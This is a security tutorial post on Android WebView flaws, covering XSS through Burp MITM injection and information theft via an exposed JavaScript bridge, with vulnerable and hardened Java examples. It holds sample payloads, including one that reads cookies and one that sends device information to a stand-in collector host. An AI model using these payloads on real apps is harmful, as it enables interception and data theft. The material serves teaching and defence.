- Juan Urbano Stordeur
TL;DR: This post uses practical examples and screenshots to demonstrate these concepts, with the aim of teaching the potential exploits and the precautions they require. For all the practical examples and exercises in this unit we use the WebViews_&_DeepLinks-true.apk application by Just Mobile Security. We also provide WebViews_&_DeepLinks-false.apk, which mitigates the vulnerabilities analyzed in this post.
In this first article, we will specifically focus on:
- XSS in WebViews
- Information Theft in WebViews
Exploitation of Open Redirect via Deep Link and File Theft will be covered in the next post. Each topic in this article is explored in detail to give a clear understanding of its impact and mitigation strategies.
Introduction to WebView Security in Android Apps
This post focuses on finding, exploiting and understanding some common vulnerabilities in Android WebViews. Essential to this analysis are two key concepts: Static and Dynamic Analysis of Android Apps.
Static analysis means examining the app's (usually decompiled) code to pinpoint potential weaknesses such as unsafe WebView settings or exposed interfaces. Dynamic analysis means observing the app while it runs, which is particularly useful for understanding how it handles network traffic and what it loads into its WebViews. Together, the two approaches give a comprehensive picture of the application and are what we use to identify and exploit WebView vulnerabilities.
The vulnerabilities that affect web applications also affect WebViews that are not configured safely, because a WebView renders remote content with the same engine. The ones relevant here are Open Redirect exploitation via Deep Link, XSS in WebViews, and potential information or file theft.
For penetration testers, a key strategy is to analyze controllable data and input fields within web & mobile applications. Determining if these inputs are sanitized is crucial. This approach helps uncover implementations in Android apps that are potentially vuln
Potentially Vulnerable Functions
This article addresses a range of functions in WebViews that could potentially be exploited. While we will discuss several critical ones, it's important to understand that there are many others. Each function, depending on its implementation and usage, can present unique security challenges.
In this example, we will analyze the WebViews_&_DeepLinks application that loads a vulnerable example site that allows XSS.
This is a site for testing and practicing XSS developed by Google.
Cross Site Scripting in WebViews
We are going to perform a MITM attack on the WebViews_&_DeepLinks app using Burp Suite. If you don't know how to use Burp Suite for a MITM attack, the Just Mobile Security team has a short video on exporting Burp's CA certificate and installing it on an Android device. Note that apps targeting API 24 or later do not trust user-installed CAs unless their Network Security Config says otherwise, so for a production app you may need a rooted device to place the certificate in the system store.
- We capture the request in Burp.
- When the WebView sends the request to fetch the page, we intercept it and inject the XSS payload, which the WebView then renders and executes.
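The following is an added example, not the WebViews_&_DeepLinks app's code, showing the WebView configuration that makes the injected payload execute next to a hardened version. The package name, the practice URL and the payload string are assumptions; only the Android APIs are real.

```java
package com.example.webviewxss; // hypothetical package; not the WebViews_&_DeepLinks app's code

import android.annotation.SuppressLint;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebResourceRequest;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;
import androidx.appcompat.app.AppCompatActivity;

/**
 * Illustrative activity. loadVulnerable() mirrors the kind of configuration a
 * JADX decompile of an unsafe app shows; loadHardened() applies the mitigations.
 */
public class WebViewActivity extends AppCompatActivity {

    // Hypothetical practice site loaded by the WebView (assumption, not the post's URL).
    private static final String TARGET_URL = "https://xss-practice.example/";
    private static final String ALLOWED_HOST = "xss-practice.example";

    // What the tester injects into the intercepted traffic in Burp (constructed sample).
    // With JavaScript enabled it executes inside the WebView with TARGET_URL's origin.
    static final String INJECTED_PAYLOAD =
            "<script>document.body.innerHTML='<h1>XSS in WebView</h1>'+document.cookie</script>";

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);
        loadVulnerable(webView);   // swap for loadHardened(webView) to compare
    }

    /** Unsafe: any content that reaches the WebView, injected or not, runs as script. */
    @SuppressLint("SetJavaScriptEnabled")
    void loadVulnerable(WebView webView) {
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);   // required for the XSS payload to execute
        settings.setAllowFileAccess(true);     // lets injected script reach file:// URLs as well
        webView.setWebViewClient(new WebViewClient()); // no navigation restrictions
        // Nothing here limits who the WebView talks to: an app that trusts the device's
        // user-installed CA store (where the Burp certificate lives) accepts Burp's
        // forged server certificate, so the proxied, modified response is rendered.
        webView.loadUrl(TARGET_URL);
    }

    /** Hardened: minimal JavaScript surface, no local file access, navigation pinned to one host. */
    void loadHardened(WebView webView) {
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(false);   // enable only if the page cannot work without it
        settings.setAllowFileAccess(false);
        settings.setAllowContentAccess(false);
        webView.setWebViewClient(new WebViewClient() {
            // This overload is called on API 24+; older devices call the String overload.
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
                Uri url = request.getUrl();
                boolean allowed = "https".equals(url.getScheme())
                        && ALLOWED_HOST.equalsIgnoreCase(url.getHost());
                return !allowed;   // true = block the navigation
            }
        });
        // Pair this with a res/xml/network_security_config.xml that trusts only
        // <certificates src="system"/> (no user-installed CAs) and pins the server's
        // certificate, so the Burp CA installed on the device is not trusted by the app.
        webView.loadUrl(TARGET_URL);
    }
}
```

The hardened path does not stop the proxy by itself; it removes the reasons the injection is useful (no script execution, no file:// access, no navigation to other hosts) and relies on the Network Security Config and pinning to keep the forged certificate from being accepted in the first place.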
Java Objects Exposed Through WebViews
Information Theft in WebView
We use the same WebViews_&_DeepLinks application.
- We decompile the APK with JADX and analyze the code to find the unsafe implementation: a Java object registered with addJavascriptInterface that returns device information to any page the WebView loads.
- We generate an XSS payload that calls this exposed interface and sends the device's information to a server we control.
- We capture the request in Burp.
- When the WebView sends the request to fetch the page, we intercept it and inject the XSS payload, which calls the interface and leaks the information.
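The following is an added example, not the app's own class, showing what the unsafe bridge found in a decompile typically looks like, the payload that abuses it, and a hardened replacement. The class, the JavaScript object name "Android", the collector host and the trusted origin are assumptions; the origin-scoped replacement uses WebViewCompat.addWebMessageListener from androidx.webkit, which is my choice of mitigation rather than something the post prescribes.

```java
package com.example.webviewxss; // hypothetical package; not the app's code

import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebView;
import androidx.webkit.WebViewCompat;
import androidx.webkit.WebViewFeature;
import java.util.Collections;
import org.json.JSONException;
import org.json.JSONObject;

/** Illustrative bridge object; the real app's class and method names may differ. */
public class DeviceBridge {

    private static final String TRUSTED_ORIGIN = "https://trusted.example"; // assumption

    /** Sensitive data assembled for whoever can call the bridge. */
    static String collectDeviceInfo() {
        JSONObject info = new JSONObject();
        try {
            info.put("manufacturer", Build.MANUFACTURER);
            info.put("model", Build.MODEL);
            info.put("sdk", Build.VERSION.SDK_INT);
        } catch (JSONException ignored) { }
        return info.toString();
    }

    // Unsafe: reachable from JavaScript in *every* origin and frame the WebView loads,
    // including a page modified in transit. (With targetSdkVersion < 17 the annotation
    // is not even required: all public methods are reachable, which historically
    // allowed code execution through reflection.)
    @JavascriptInterface
    public String getDeviceInfo() {
        return collectDeviceInfo();
    }

    /** Registration as seen in a JADX decompile; "Android" is the global JS name (assumed). */
    static void attachUnsafe(WebView webView) {
        webView.addJavascriptInterface(new DeviceBridge(), "Android");
    }

    // Constructed payload injected through Burp: calls the bridge and exfiltrates the
    // result to a hypothetical collector host via an image request.
    static final String EXFIL_PAYLOAD =
            "<script>new Image().src='https://collector.example/c?d='"
            + "+encodeURIComponent(Android.getDeviceInfo());</script>";

    // Hardened: no addJavascriptInterface at all. The androidx.webkit message listener
    // is bound to an explicit origin allow-list, so script in any other origin (or in a
    // MITM-modified page served from elsewhere) cannot reach it, and the handler checks
    // the origin and frame again before answering with only what the page needs.
    static void attachHardened(WebView webView) {
        webView.removeJavascriptInterface("Android");   // in case an older build registered it
        if (!WebViewFeature.isFeatureSupported(WebViewFeature.WEB_MESSAGE_LISTENER)) {
            return; // no bridge at all on WebView versions without origin-scoped messaging
        }
        WebViewCompat.addWebMessageListener(webView, "deviceBridge",
                Collections.singleton(TRUSTED_ORIGIN),
                (view, message, sourceOrigin, isMainFrame, replyProxy) -> {
                    if (!isMainFrame || !TRUSTED_ORIGIN.equals(sourceOrigin.toString())) {
                        return;   // ignore iframes and any unexpected origin
                    }
                    if ("sdk".equals(message.getData())) {
                        replyProxy.postMessage(String.valueOf(Build.VERSION.SDK_INT));
                    }
                });
    }
}
```

The key difference is where the trust decision is made: a @JavascriptInterface method has no way to learn which origin called it, so anything it returns belongs to every page the WebView ever renders, whereas the message listener is scoped to an origin list at registration time and receives the caller's origin on every message.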
Remember, while these technologies offer numerous benefits, their secure implementation is vital to protect both the app and user data. We will continue to explore these topics, so stay tuned for the next post, which will focus on Deep Links and their associated security considerations.